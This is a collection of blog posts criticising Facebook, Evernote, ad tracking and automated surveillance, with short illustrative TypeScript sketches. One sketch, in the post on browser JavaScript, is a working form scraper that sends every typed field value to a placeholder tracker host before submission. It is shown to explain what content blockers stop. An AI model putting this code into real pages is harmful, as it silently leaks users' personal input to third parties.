
Be Smart, Use Dumb Devices

The latest news in the world of Things Which Are Too "Smart" For Their Users’ Good is that Facebook have released a new device in their Portal range: a video camera that sits on your TV and lets you make video calls via Facebook Messenger and WhatsApp (which is also owned by Facebook).

This is both a great idea and a terrible one. I am on the record as wanting a webcam for my AppleTV so that I could make FaceTime calls from there:

In fact, I already do the hacky version of this by mirroring my phone’s screen with AirPlay and then propping it up so the camera has an appropriate view.

Why would I do this? One-word answer: kids. The big screen has a better chance of holding their attention, and a camera with a nice wide field of view would be good too, to capture all the action. Getting everyone to sit on the couch or rug in front of the TV is easier than getting everyone to look into a phone (or even iPad). I’m not sure about the feature where the camera tries to follow the speaker; in these sorts of calls, several people are speaking most of the time, so I can see it getting very confused. It works well in boardroom setups where there is a single conversational thread, but even then, most of the good systems I’ve seen use two cameras, so that the view can switch in software rather than waiting for mechanical rotation.

So much for the "good idea" part. The reason it’s a terrible idea in this case is that it’s from Facebook. Nobody in their right mind would want an always-on device from Facebook in their living room, with a camera pointed at their couch, and listening in on the video calls they make. Facebook have shown time and time and time again that they simply cannot be trusted.

An example of why the problem is Facebook itself, rather than any one product or service, is the hardware switch for turning the device’s camera off. The switch is highlighted when it is in the off position, and an LED illuminates… to show that the camera and microphone are off.

Many people have commented that this setup looks like a classic dark pattern in UX, just implemented in hardware. My personal opinion is that the switch is more interesting as an indicator of Facebook’s corporate attitude to internet services: they are always on, and it’s an anomaly if they are off. In fact, they may even consider the design of this switch to be a positive move towards privacy, by highlighting when the device is in "privacy mode". The worrying aspect is that this design makes privacy an anomaly, a mode that is entered briefly for whatever reason, a bit like Private or Incognito mode in a web browser. If you’re wondering why a reasonable person might be concerned about Facebook’s attitude to user privacy, a quick read of just the "Privacy issues" section of the Wikipedia article on Facebook criticism will probably have you checking your permissions. At a bare minimum, I assume that entering "privacy mode" is itself a tracked event, subject to later analysis…

Trust, But Verify

IoT devices need a high degree of trust anyway because of all the information that they are inherently privy to. Facebook have proven that they will go to any lengths to gather information, including information that was deliberately not shared by users, process it for their own (and their advertising customers’) purposes, and do an utterly inadequate job of protecting it.

The idea of a smart home is attractive, no question – but why do the individual devices need to be smart in their own right? Unnecessary capabilities increase the vulnerability surface for abuse, either by a vendor/operator or by a malicious attacker. Instead, better to focus on devices which have the minimum required functionality to do their job, and no more.

A perfect example of this latter approach is IKEA’s collaboration with Sonos. The Symfonisk speakers are not "smart" in the sense that they have Alexa, Siri, or Google Assistant on board. They also do not connect directly to the Internet or to any one particular service. Instead, they rely on the owner’s smartphone to do all the hard work, whether that is running Spotify or interrogating Alexa. The speaker just plays music.

I would love a simple camera that perched on top of the TV, either as a peripheral to the AppleTV, or extending AirPlay to be able to use video sources as well. However, as long as doing this requires a full device from Facebook¹ – or worse, plugging directly into a smart TV² – I’ll keep on propping my phone up awkwardly and sharing the view to the TV.


  1. Or Google or Amazon – they’re not much better. 

  2. Sure, let my TV watch everything that is displayed and upload it for creepy "analysis".³ 

  3. To be clear, I’m not wearing a tinfoil hat over here. I have no problem simply adding a "+1" to the viewer count for The Expanse or whatever, but there’s a lot more that goes on my TV screen: photos of my kids, the content of my video calls, and so on and so forth. I would not be okay with sharing the entire video buffer with unknown third parties. This sort of nonsense is why my TV has never been connected to the WiFi. It went online once, using an Ethernet cable, to get a firmware update – and then I unplugged the cable. 

Once More On Privacy

Facebook is in court yet again over the Cambridge Analytica scandal, and one of their lawyers made a most revealing assertion:

There is no invasion of privacy at all, because there is no privacy

Now on one level, this is literally true. Facebook's lawyer went on to say that:

Facebook was nothing more than a "digital town square" where users voluntarily give up their private information

The issue is a mismatch in expectations. Users have the option to disclose information as fully public, or variously restricted: only to their friends, or to members of certain groups. The fact that something is said in the public street does not mean that the user would be comfortable having it published in a newspaper, especially if they were whispering into a friend’s ear at the time.

Legally, Facebook may well be in the right (IANAL, nor do I play one on the Internet), but in terms of users’ expectations, they are undoubtedly in the wrong. However, for once I do not lay all the blame on Facebook.

Mechanisation and automation are rapidly subverting common-sense expectations in a number of fields, and consequences can be wide-reaching. Privacy is one obvious example, whether it is Facebook’s or Google’s analysis of our supposedly private conversations, or facial recognition in public places.

For an example of the reaction to the deployment of these technologies, the city of San Francisco, generally expected to be an early adopter of technological solutions, recently banned the use of facial recognition technology. While the benefits for law enforcement of ubiquitous automated facial recognition are obvious, the adoption of this technology also subverts long-standing expectations of privacy – even in undoubtedly public spaces. While it is true that I can be seen and possibly recognised by anyone who is in the street at the same time as me, the human expectation is that I am not creating a permanent, searchable record of my presence in the street at that time, nor that such a record would be widely available.

To make the example concrete, let’s talk for a moment about numberplate recognition. Cars and other motor vehicles have number plates to make them recognisable, including for law enforcement purposes. As technology developed, automated reading of license plates became possible, and is now widely adopted for speed limit enforcement. Around here things have gone a step further, with average speeds measured over long distances.
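
To make the mechanics concrete, here is a rough sketch of how average-speed measurement works: the same plate is timestamped at two cameras a known distance apart, and the average speed is simply distance divided by elapsed time. The plate format, distances, and limit below are invented for illustration.

```typescript
// Minimal sketch of average-speed enforcement (illustrative only).
// A plate is timestamped at two cameras a known distance apart;
// average speed = distance / elapsed time.

interface PlateSighting {
  plate: string;         // e.g. "AB12 CDE" – hypothetical format
  cameraKm: number;      // camera position along the road, in km
  timestampSec: number;  // Unix time, in seconds
}

function averageSpeedKmh(entry: PlateSighting, exit: PlateSighting): number {
  const distanceKm = Math.abs(exit.cameraKm - entry.cameraKm);
  const hours = (exit.timestampSec - entry.timestampSec) / 3600;
  return distanceKm / hours;
}

// Example: 10 km between gantries, covered in 5 minutes → 120 km/h average.
const entry: PlateSighting = { plate: "AB12 CDE", cameraKm: 0, timestampSec: 0 };
const exit: PlateSighting = { plate: "AB12 CDE", cameraKm: 10, timestampSec: 300 };
console.log(averageSpeedKmh(entry, exit)); // 120 – flagged, if the limit were 110 km/h
```

Note that the system computes exactly one number per vehicle and compares it against one threshold – a point I will come back to below.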

Who could object to enforcing the law?

The problem with automated enforcement is that it is only as good as it is programmed to be. It is true that hardly anybody breaks the speed limit on the monitored stretches of motorway any more – or at least, not more than once. However, there are also a number of negative consequences. Lane discipline has fallen entirely by the wayside since the automated systems were introduced, with slow vehicles cruising in the middle or even the outside lane while the inside lanes sit empty. The automated enforcement has also removed any pressure to consider what is an appropriate speed for the conditions, with many drivers continuing to drive at or near the speed limit even in weather or traffic conditions where that speed is totally unsafe. Finally, there is no recognition that, at 4am with nobody on the roads, there is no need to enforce the same speed limit that applies at rush hour.

Human-powered on-the-spot enforcement – the traffic cop flagging down individual motorists – had the option to modulate the law, turning a blind eye to safe speed and punishing driving that might be inside the speed limit but unsafe in other ways. Instead, automated enforcement is dumb (it is, after all, binary) and only considers the single metric it was designed to consider.

There are of course any number of problems with a human-powered approach as well; members of ethnic or social minorities all have stories involving the police looking for something – anything – to book them for. I’m a straight white cis-het guy, and still once managed to fall foul of the proverbial bored cops, who took my entire car apart looking for drugs (that weren’t there) and then left me by the side of the road to put everything back together. However, automated enforcement makes all of these problems worse.

Facial recognition has documented issues with accuracy when it comes to ethnic minorities and women – basically anyone but the white male programmers who created the systems. If police start relying on such systems, people are going to have serious difficulties trying to prove that they are not the person in the WANTED poster – because the computer says they are a match. And that’s if they don’t just get gunned down, of course.

It is notoriously hard to opt out of these systems when they are used for advertising, but when they are used for law enforcement, it becomes entirely impossible to opt out, as a London man found when he was arrested for covering his face during a facial recognition trial on public streets. A faulty system is even worse than a functional one, as its failure modes are unpredictable.

Systems rely on data, and data storage is also problematic. I recently had to get a government-issued electronic ID. Normally this should be a simple online application, but I kept getting weird errors, so I went to the office with my (physical) ID instead. There, we realised that the problem was with my place of birth. I was born in what was then Strathclyde, but this is no longer an option in up-to-date systems, since the region was abolished in 1996. However, different databases were disagreeing, and we were unable to move forward. In the end, the official effectively helped me to lie to the computer, picking an acceptable jurisdiction in order to move forwards in the process – and thereby of course creating even more inaccuracies and inconsistency. So much for "the computer is always right"… Remember, kids: Garbage In, Garbage Out!

What, Me Worry?

The final argument comes down, as it always does with privacy, to the objection that "there’s nothing to fear if you haven’t done anything wrong". Leaving aside the issues we just discussed around the possibility of running into problems even when you really haven’t done anything wrong, the issue is with the definition of "wrong". Social change is often driven by movement in the grey areas of the law, as well as selective enforcement of those laws. First gay sex is criminalised, so underground gay communities spring up. Then attitudes change, but the laws are still on the books; they just aren’t enforced. Finally the law catches up. If algorithms actually are watching all of our activity and are able to infer when we might be doing something that’s frowned upon by some¹, that changes the dynamic very significantly, in ways which we have not properly considered as a society.

And that’s without even considering where else these technologies might be applied, beyond our pleasant Western bubble. What about China, busy turning Xinjiang into an open-air prison for the Uyghur minority? Or "Saudi" Arabia, distributing smartphone apps to enable husbands to deny their wives permission to travel?

Expectations of privacy are being subverted by scale and automation, without a real conversation about what that means. Advertisers and the government stick to the letter of the law, but there is no recognition of the material difference between surveillance that is human-powered, and what happens when the same surveillance is automated.


Photo by Glen Carrie and Bryan Hanson via Unsplash


  1. And remember, the algorithms may not even be analysing your own data, which you carefully secured and locked down. They may have access to data for one of your friends or acquaintances, and then the algorithm spots a correlation in patterns of communication, and associates you with them. Congratulations, you now have a shadow profile. And what if you are just really unlucky in your choice of local boozer, so now the government thinks you are affiliated with the IRA offshoot du jour, when all you were after was a decent pint of Guinness? 

Advertise With The End In Mind

Even though I no longer work directly in marketing, I’m still adjacent, and so I try to keep up to date with what is going on in the industry. One of the most common-sensical and readable voices is Bob Hoffman, perhaps better known as the Ad Contrarian. His latest post is entitled The Simple-Minded Guide To Marketing Communication, and it helpfully dissects the difference between brand advertising and direct-response advertising (emphasis mine):

[…] our industry's current obsession with precision targeted, one-to-one advertising is misguided. Precision targeting may be valuable for direct response. But history shows us that direct response strategies have a very low likelihood of producing major consumer facing brands. Building a big brand requires widespread attention. Precision targeted, one-to-one communication has a low likelihood of delivering widespread attention.

Now Bob is not just an armchair critic; he has quite the cursus honorum in the advertising industry, and so he speaks from experience.

In fact, events earlier this week bore out his central thesis. With the advent of GDPR, many US-based websites opted to cut off EMEA readers rather than attempt to comply with the law. This action helpfully made it clear who was doing shady things with their users’ data, thereby providing a valuable service to US readers, while hardly inconveniencing European readers at all.

The New York Times, with its strong international readership, was not willing to cut off overseas ad revenue. Instead, they went down a different route (emphasis still mine):

The publisher blocked all open-exchange ad buying on its European pages, followed swiftly by behavioral targeting. Instead, NYT International focused on contextual and geographical targeting for programmatic guaranteed and private marketplace deals and has not seen ad revenues drop as a result, according to Jean-Christophe Demarta, svp for global advertising at New York Times International.

Digiday has more details, but that quote has the salient facts: turning off invasive tracking – and the targeted advertising which relies on it – did not hurt ad revenues at all.

This is of course because knowing someone is reading the NYT, and perhaps which section, is quite enough information to know whether they are an attractive target for a brand to advertise to. Nobody has ever deliberately clicked from serious geopolitical analysis to online impulse shopping. However, the awareness of a brand and its association with Serious Reporting will linger in readers’ minds for a long time.
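
If you want to picture just how simple contextual targeting is, here is a toy sketch: the only inputs are the section of the page being read and a coarse geography – no cookie, no behavioural profile. The section-to-campaign mapping is entirely made up.

```typescript
// Contextual ad selection: the ad is chosen from the page itself and a coarse
// geography, with no user profile involved. The mapping is invented.
const adsBySection: Record<string, string[]> = {
  business: ["wealth-management", "business-class-fares"],
  technology: ["cloud-hosting", "laptops"],
  travel: ["hotels", "luggage"],
};

function pickAd(section: string, countryCode: string): string {
  const candidates = adsBySection[section] ?? ["house-ad"];
  // Geographic targeting filters the campaign, not the reader.
  return `${candidates[0]}?geo=${countryCode}`;
}

console.log(pickAd("business", "DE")); // "wealth-management?geo=DE"
```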

The NYT sells its own ads, which is not really scalable for most outlets, but I hope other people are paying attention. Maybe there is room in the market for an advertising offering that does not force users to deal with cookies and surveillance and interstitial screens and page clutter and general creepiness and annoyance, while still delivering the goods for its clients?


🖼️ Photo by Kate Trysh on Unsplash

The Shape Of 2019

They said they need real-world examples, but I don’t want to be their real-world mistake

That quote comes from an NYT story about people attacking self-driving vehicles. I wrote about these sentiments before, after the incident which spurred these attacks:

It’s said that you shouldn’t buy any 1.0 product unless you are willing to tolerate significant imperfections. Would you ride in a car operated by software with significant imperfections?
Would you cross the street in front of one?
And shouldn’t you have the choice to make that call?

Cars are just the biggest manifestation of this experimentation that is visible in the real world. How often do we have to read about Facebook manipulating the content of users’ feeds – just to see what happens?

And what about this horrific case?

Meanwhile, my details were included in last year’s big Marriott hack, and now I find out that my passport details may have been included in the leaked information. Marriott’s helpful suggestion? A year’s free service – from Experian. Yes, that Experian, the one you know from one of the biggest hacks ever.

I don’t want to be any company’s real world mistake in 2019.


🖼️ Photo by chuttersnap on Unsplash

Privacy Policy

Short version: I don’t have one.

Long version: I don’t gather any data, I even turned off Google Analytics (and not just because it was depressing me with its minuscule numbers!), and I don’t have access to the server logs even if I wanted to look at IP addresses or whatever. This blog’s host, Postach.io, have their own privacy policy here.

Regarding analytics specifically, I am somewhat curious about how many people read individual posts, but I’m not going to sell you out to Google so you can see adverts for whatever you read about here following you all over the internet for the next two weeks. Neither of us gets enough benefit for that to be worthwhile.

Privacy Versus AI

There is a widespread assumption in tech circles that privacy and (useful) AI are mutually exclusive. Apple is assumed to be behind Amazon and Google in this race because of its choice to do most data processing locally on the phone, instead of uploading users’ private data in bulk to the cloud.

A recent example of this attitude comes courtesy of The Register:

Predicting an eventual upturn in the sagging smartphone market, [Gartner] research director Ranjit Atwal told The Reg that while artificial intelligence has proven key to making phones more useful by removing friction from transactions, AI required more permissive use of data to deliver. An example he cited was Uber "knowing" from your calendar that you needed a lift from the airport.

I really, really resent this assumption that connecting these services requires each and every one of them to have access to everything about me. I might not want information about my upcoming flight shared with Uber – where it can be accessed improperly, leading to someone knowing I am away from home and planning a burglary at my house. Instead, I want my phone to know that I have an upcoming flight, and offer to call me an Uber to the airport. At that point, of course I am sharing information with Uber, but I am also getting value out of it. Otherwise, the only one getting value is Uber. They get to see how many people in a particular geographical area received a suggestion to take an Uber and declined it, so they can then target those people with special offers or other marketing to persuade them to use Uber next time they have to get to the airport.
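
Here is a rough sketch of what I mean – with invented names throughout, so this is not anyone’s actual API: the flight is detected from the local calendar, on the device, and nothing goes to the ride-hailing service until I explicitly accept the suggestion.

```typescript
// On-device suggestion: the flight lives only in the local calendar.
// Nothing is shared with the ride-hailing service until the user says yes.

interface CalendarEvent {
  title: string;
  location: string;
  startsAt: Date;
}

function suggestRideToAirport(events: CalendarEvent[], now: Date): CalendarEvent | null {
  // Purely local heuristic: a flight leaving within the next three hours.
  const windowMs = 3 * 60 * 60 * 1000;
  return (
    events.find((e) => {
      const untilStart = e.startsAt.getTime() - now.getTime();
      return /flight|airport/i.test(e.title + " " + e.location) && untilStart > 0 && untilStart < windowMs;
    }) ?? null
  );
}

// Only if the user taps "yes" does anything leave the phone – and only the
// minimum needed to book the ride, not the calendar itself.
declare function requestRide(req: { destination: string; arriveBy: Date }): void; // hypothetical call

function onUserAccepted(event: CalendarEvent): void {
  requestRide({ destination: event.location, arriveBy: event.startsAt });
}
```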

I might be happy sharing a monthly aggregate of my trips with the government – so many by car, so many on foot, or by bicycle, public transport, or ride sharing service – which they could use for better planning. I would absolutely not be okay with sharing details of every trip in real time, or giving every busybody the right to query my location in real time.

What prevents progress here is that so much of the debate is taken up with this kind of unproductive all-or-nothing argument. I have written about this concept of granular privacy controls before:

The government sets up an IDDB which has all of everyone's information in it; so far, so icky. But here's the thing: set it up so that individuals can grant access to specific data in that DB - such as the address. Instead of telling various credit card companies, utilities, magazine companies, Amazon, and everyone else my new address, I just update it in the IDDB, and bam, those companies' tokens automatically update too - assuming I don't revoke access in the mean time.

This could also be useful for all sorts of other things, like marital status, insurance, healthcare, and so on. Segregated, granular access to the information is the name of the game. Instead of letting government agencies and private companies read all the data, each of them gets access only to those data they need to do their jobs.
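
To make that a little more concrete, a minimal sketch of what such scoped, revocable grants might look like is below. The IDDB itself, the field names, and the token mechanism are all hypothetical.

```typescript
// Hypothetical IDDB with scoped, revocable access grants.
// Each relying party holds a token that resolves only the fields it was granted.

type Field = "address" | "maritalStatus" | "dateOfBirth";

interface Citizen {
  id: string;
  data: Record<Field, string>;
}

interface Grant {
  token: string;
  citizenId: string;
  fields: Field[];   // e.g. a utility company gets ["address"] and nothing else
  revoked: boolean;
}

class IdDb {
  constructor(private citizens: Map<string, Citizen>, private grants: Map<string, Grant>) {}

  // A relying party reads through its token; a revoked grant or an
  // out-of-scope field simply returns nothing.
  read(token: string, field: Field): string | undefined {
    const grant = this.grants.get(token);
    if (!grant || grant.revoked || !grant.fields.includes(field)) return undefined;
    return this.citizens.get(grant.citizenId)?.data[field];
  }

  // The citizen updates once; every non-revoked grant sees the new value.
  update(citizenId: string, field: Field, value: string): void {
    const citizen = this.citizens.get(citizenId);
    if (citizen) citizen.data[field] = value;
  }

  revoke(token: string): void {
    const grant = this.grants.get(token);
    if (grant) grant.revoked = true;
  }
}
```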

Unfortunately, we are stuck in a stale all-or-nothing discussion: either you surround yourself with always-on internet-connected microphones and cameras, or you might as well retreat to a shack in the woods. There is a middle ground, and I wish more people (besides Apple) recognised that.


Photo by Kyle Glenn on Unsplash

Sowing Bitter Seeds

The Internet is outraged by… well, a whole lot of things, as usual, but in particular by Apple. For once, however, the issue is not phones that are both unexciting and unavailable, lacking innovation and wilfully discarding convention, and also both over- and under-priced. No, this time the issue is apps, and in particular VPN apps.

Authoritarian regimes around the world (Russia, "Saudi" Arabia, China, North Korea, etc) have long sought to control their populations' access to information in general, and to the Internet in particular. Of course anyone with a modicum of technical savvy - or a friend, relative, or passing acquaintance willing to do the simple setup - can keep unfettered access to the Internet by going through a Virtual Private Network, or VPN.

A VPN does what it says on the tin: it creates a virtual network that connects directly with an endpoint somewhere else; importantly, somewhere outside the authoritarian regime's control. As such, VPNs have always existed in something of a grey area, but now China (the People's Republic, not that other China) has gone ahead and formally banned their use.

In turn, Apple have responded by removing unregistered VPN apps (which in practical terms means all of them) from their App Store in China. In the face of the Internet's predictable outrage, Apple provided this bald statement (via TechCrunch):

Earlier this year China’s MIIT announced that all developers offering VPNs must obtain a license from the government. We have been required to remove some VPN apps in China that do not meet the new regulations. These apps remain available in all other markets where they do business.

Now Apple do have a point; the law is indeed the law, and because they operate in China, they need to comply with it, just as they would with laws in any other country.

Here's the rub, though. By the regionalised way they have set up their App Store service, they have made themselves unnecessarily vulnerable to this sort of arm-twisting by unfriendly governments. Last time I wrote about geo-fencing and its consequences, the cause of the day was Russia demanding removal of the LinkedIn app, and China (them again!) demanding removal of the New York Times app. As I wrote at the time, companies like Apple originally set up the infrastructure for these geographic restrictions to enable IP protection, but the same tools are being repurposed for censorship:

This sort of restriction used to be “just" hostile to consumers. Now, it is turning into a weapon that authoritarian regimes can wield against Apple, Google, and whoever else. Nobody would allow Russia to ban LinkedIn around the world, or China to remove the New York Times app everywhere - but because dedicated App Stores exist for .ru and .cn, they are able to demand these bans as local exceptions, and even defend them as respecting local laws and sensibilities. If there were one worldwide App Store, this gambit would not work.

The argument against the infrastructure of laws and regulations that was put in place to enable (ineffective) IP restrictions was always that it could be, and would be, repurposed to enable repression by authoritarian regimes. People scoffed at these privacy concerns, saying "if you have nothing to hide, you have nothing to fear". But what if your government is the next to decide that reading the NYT or having a LinkedIn profile is against the law? How scared should you be then?

If you are designing a social network or other system with the expectation of widespread adoption, these days this has to be part of your threat model. Otherwise, one day the government may come knocking, demanding your user database for any reason or no reason at all - and what seemed like a good idea at the time will end up messing up a lot of people's lives.

Product designers by and large do not think of such things, as we saw when Amazon decided that it would be perfectly reasonable to give everyone in your address book access to your Alexa device - and make it so users could not turn off this feature without a telephone call to Amazon support.

How well do you think that would go down if you were a dissident, or just in the social circle of one?

Our instinctive attitude to data is to hoard them, but this instinct is obsolete, forged in a time when data were hard to gather, store, and access. It took something on the scale of the Stasi to build and maintain profiles on even six million citizens (out of a population of sixteen million), and the effort and expense was part of what broke the East German regime in the end. These days, it's trivial to build and access such a profile for pretty much anyone, so we need to change our thinking about data - how we gather them, and how we treat them once we have them.

Personal data are more akin to toxic waste, generated as a byproduct of valuable activity and needing to be stored with extreme care because of the dire consequences of any leaks. Luckily, data are different from toxic waste in one key respect: they can be deleted, or better, never gathered in the first place. The same goes for many other choices, such as restricting users to one particular geographical App Store, or making it easy to share your entire contact list (including by mistake), but very difficult to take that decision back.

What other design decisions are being made today based on obsolete assumptions that will come back to bite users in the future?


UPDATE: And there we go, now Russia is following China’s example and banning VPNs as well. The idea of a technical fix to social and legal problems is always a short-term illusion.


Image by Sean DuBois via Unsplash

The Enemy Within The Browser

At what point do the downsides of Javascript in the browser exceed the upsides? Have we already passed that point?

If you have any concept of security, the idea of downloading code from the Internet and immediately executing it, sight unseen, on your local machine, should give you the screaming heebie-jeebies. A lot of work has gone into sandboxing the browser processes so that Javascript cannot escape the browser itself, and later, the individual web page that it came from. However, this only dealt with the immediate and obvious vulnerability.

These days, the problem with Javascript is that it is used to track users all over the internet and serve them ads for the same products on every site. Quite why this requires 14 MB and 330 HTTP requests for 537 words is not entirely clear.

Actually, no, it is entirely clear: it is because the copro-grammers ("writers of feces") who produce this stuff have no respect for the users. The same utter disrespect underlies the recent bloat in iOS apps:

One Friday I turned off auto-update for apps and let the update queue build up for a week. The results shocked me.
After the first week I had 7.59GB of updates to install, spread across 67 apps – averaging 113MB per app.

Okay, so maybe you say who cares, you only update apps over wifi - but do you only browse on wifi? 14 MB for a few hundred words - that adds up fast.

And what else is that Javascript up to, beyond wasting bytes - both over the air, and in local storage?

How about snaffling data entered into a form, regardless of whether it has been submitted?

Using Javascript, those sites were transmitting information from people as soon as they typed or auto-filled it into an online form. That way, the company would have it even if those people immediately changed their minds and closed the page.
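
Mechanically there is nothing exotic about this: a third-party script listens for input events and ships each value off to its own server before you ever press submit. The endpoint below is made up, but this is exactly the kind of pattern that content blockers exist to stop.

```typescript
// Illustration of pre-submit form scraping (the kind of thing being blocked).
// A tracking script doesn't wait for the submit button – it listens to every
// field as you type or auto-fill, and ships the value off immediately.
document.querySelectorAll("input, textarea").forEach((el) => {
  el.addEventListener("input", (event) => {
    const field = event.target as HTMLInputElement;
    // "tracker.example" is a made-up endpoint for illustration.
    navigator.sendBeacon(
      "https://tracker.example/collect",
      JSON.stringify({ name: field.name, value: field.value, page: location.href })
    );
  });
});
```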

My house, my rules. I look forward to iOS 11, and enabling every blocking feature I can.

I really want media sites to earn money so that they can continue to exist, but they cannot do it at my expense. A banner ad is fine, but 14 MB of Javascript to serve me the same banner ad everywhere - at my expense! - is beyond the pale.

Javascript delenda est.

How To Lose Friends and Influence People

I am a huge fan of Evernote. I have used their software for many years, and its many features are key parts of my workflow. I take notes on multiple devices, use tagging to sync between those devices, take snapshots of business cards and let the OCR and the access to LinkedIn sort out the details, annotate images and PDFs, and more.

I should say, I used to be a fan of Evernote. They recently made some changes to their privacy policy that have users up in arms. Here is the relevant entry from their changelog:

Privacy Policy

January 23, 2017 updates to the October 4, 2016 version:

We clarified that in building a more personalized Evernote service that can adapt to the way you think and work, a small group of engineers may need to oversee these automated technologies to ensure they are working as intended. Also, we added that we will be using data from other sources to tailor your Evernote experience and explain how you can get more out of your Evernote account. Please see our FAQ for more information on these changes.

Updates to our legal documents | Evernote

This may be fairly inoffensive, but it is worrying to me and to many users. These days, “personalisation" is often code for "gathering data indiscriminately for obscure purposes that may change at any time". This exchange is generally presented as a bargain where users sacrifice (some) privacy to the likes of Google in exchange for free use of their excellent services such as Gmail or Maps.

Evernote's case is different. Because it is a paid app, we users like to assume that we are opting out of that bargain, paying directly for our services instead of paying indirectly by authorising Evernote to resell our personal data to advertisers.

In addition, we use Evernote to store data that may be personal, sensitive, or both. Evernote have always had some weasel words in their Privacy Policy about their employees having access to our notes:

  • We believe our Terms of Service has been violated and confirmation is required or we otherwise have an obligation to review your account Content as described in our Terms of Service;
  • We need to do so for troubleshooting purposes or to maintain and improve the Service;
  • Where necessary to protect the rights, property or personal safety of Evernote and its users (including to protect against potential spam, malware or other security concerns); or
  • In order to comply with our legal obligations, such as responding to warrants, court orders or other legal process. We vigilantly protect the privacy of your account Content and, whenever we determine it possible, we provide you with notice if we believe we are compelled to comply with a third party’s request for information about your account. Please visit our Information for Authorities page for more information.

So basically, Evernote employees have always had access to our stuff. This part of the privacy policy has not changed substantially, but the changes are worrying (emphasis mine):

  • New: Do Evernote Employees Access or Review My Data?
  • Old: Do Evernote Employees Access or Review My Notes?

  • New: Below are the limited circumstances in which we may need to access or review your account information or Content:

  • Old: As a rule, Evernote employees do not monitor or view your personal information or Content stored in the Service, but we list below the limited circumstances in which our employees may need to access or review your personal information or account Content:

  • New: We need to do so for troubleshooting purposes or to maintain and improve the Service;

  • Old: We need to do so for troubleshooting purposes;

Privacy Policy | Evernote
Privacy Policy - 2017 update

Now, here is why people are all up in arms. We would like service providers to tread extremely carefully when it comes to our personal data, accessing it only when warranted. 2016 has provided plenty of object lessons in why we are so sensitive; just today I received an email from Yahoo detailing their latest hack. Yahoo hack: Should I panic? - BBC News

In this case, Evernote appear to have made two mistakes. First, they designed and built new functionality that requires access to users’ personal data and content in order to do… well, it’s not entirely clear what they want to do, beyond the fact that it involves machine learning.

Secondly, they completely mis-handled the communication of this change. I mean, they even removed the disclaimer that “As a rule, Evernote employees do not monitor or view your personal information or Content stored in the Service"! How tone-deaf can you get?

It’s also very unclear why they even made this change. In their response to the outrage, they say this:

We believe we can make our users even more productive with technologies such as machine learning that will allow you to automate functions you now have to do manually, like creating to-do lists or putting together travel itineraries.

A Note From Chris O’Neill about Evernote’s Privacy Policy

The problem is, users are perfectly capable of managing to-do lists and itineraries, and based on an informal sample of Twitter reactions to this new policy, do not see enough value to want to give unknown Evernote employees access to their data.

An unforced error

This is such a short-sighted decision by Evernote. As one of the few cloud services which is used primarily through fat clients, Evernote is in a privileged position when it comes to pushing processing out to the users’ devices.

Apple have the same advantage, and do the right thing with it: instead of snooping around in my mail and calendar on the server side, my local Mail app can detect dates in messages and offer to create appointments in Calendar. Also, CloudKit’s sync services are encrypted, so nobody at Apple has access to my data - not even if law enforcement asks.
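
A purely local data detector needs nothing more than a scan of the message text on the device – no server involved. The snippet below is a toy illustration with a deliberately simplistic regex and a hypothetical calendar call, not Apple's actual implementation.

```typescript
// Sketch of purely local detection: scan the message body on the device,
// surface a suggestion, and never send the text anywhere. Regex is simplified.
function detectDate(messageBody: string): Date | null {
  const match = messageBody.match(/\b(\d{1,2})\/(\d{1,2})\/(\d{4})\b/); // e.g. 24/01/2017
  if (!match) return null;
  const [, day, month, year] = match.map(Number);
  return new Date(year, month - 1, day);
}

declare function proposeCalendarEvent(date: Date): void; // hypothetical local API

const when = detectDate("Dinner on 24/01/2017 at 8pm?");
if (when) {
  // The calendar suggestion is created locally; the mail never leaves the machine.
  proposeCalendarEvent(when);
}
```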

Evernote have chosen not to take that approach, and have not (yet) clarified any benefit that they expect or promise to deliver by doing so. This mis-step has now caused loyal, paying users like me to re-evaluate everything else about the service. At this point, even cancelling the new machine-learning service would not be enough to mollify users; nothing short of a new and explicit commitment to complete encryption of user data - including from Evernote employees! - would suffice.

Evernote's loss will be someone else’s gain

One possible winner from this whole mess is Bear, a new note-taking app that does use CloudKit and is therefore able to provide the encryption at rest that Evernote does not.

Bear - Notes for iPhone, iPad and Mac

The Bear team have even been having some fun on Twitter at Evernote’s expense:

I composed this post in Bear, and I have to say, it is very nice. I copied it over to Evernote to publish here, but it’s the first crack. Before this mess, I was a vocal advocate of Evernote. Now? I am actively evaluating alternatives.

Respect your users, yo.

One more time

I have worked all my career in enterprise IT, either as a sysadmin, or for vendors of enterprise IT tools. There are many annoyances in big-company IT, but one of the most frustrating is when people miss key aspects of what makes corporate IT tick.

One area is the difference between a brand-new startup whose entire IT estate consists of a handful of bestickered MacBooks, and a decades-old corporation with the legacy IT that history brings. Case in point: Google is stealing away Microsoft’s future corporate customers.

Basically, it turns out that - to absolutely nobody's surprise - startups overwhelmingly use Google's email services. Guess what? Running your own email server for just a few users is not a highly differentiating activity, so it makes sense to hand it off to Google. Big companies on the other hand have a legacy that means it makes sense to stick with what they have and know, which generally means Microsoft Exchange.

So far, so good. The key factor that is missing in this analysis is time. What happens when those startups grow to become mid-size companies or even join the Fortune 50 themselves? Do they stick with Google's relatively simple services, or do they need to transition at some point to an "enterprise" email solution?

It is now clear that Google does deep inspection of email contents. So far, this appears to be done for good: Paedophile snared as Google scans Gmail for images of child abuse. However, if I were in a business that competes with Google - and these days, that could be anything - I would feel distinctly uncomfortable about that.

There are also problems of corporate policy and compliance that apply to proper grown-up companies. At the simplest level, people often have their own personal Gmail accounts as well, and with Google's decision to use that login for all their services, there is enormous potential for bleed-over between the two domains. At a more complex level, certain types of data may be required to be stored in such a way that no third parties (such as Google) have access to them. Gmail would not work for that requirement either.

Simply put, startups have different needs from big established corporations. The cost of full-time IT staff is huge for a small startup. The alternative of doing your own support doesn't work either, because every hour spent setting up, maintaining or troubleshooting IT infrastructure is an hour that you don't spend working on your actual product. For a big corporation with thousands of employees, on the other hand, it makes a lot of sense to dedicate a few to in-house IT support, especially if the alternatives include major fines or even seeing managers go to jail. The trend Quartz identified is interesting, but it's a snapshot of a point in time. What would be more interesting would be to see the trend as those companies grow and change from one category to another.

A corollary to this is that business IT is not consumer IT. Trying to mix the two is a recipe for disaster. Big B2B vendors end up looking very silly when they try to copy Apple, and journalists look just as silly when they fail to understand key facts about the differences between B2B and consumer IT, and between small-company IT and big-company IT.


Image by Philipp Henzler via Unsplash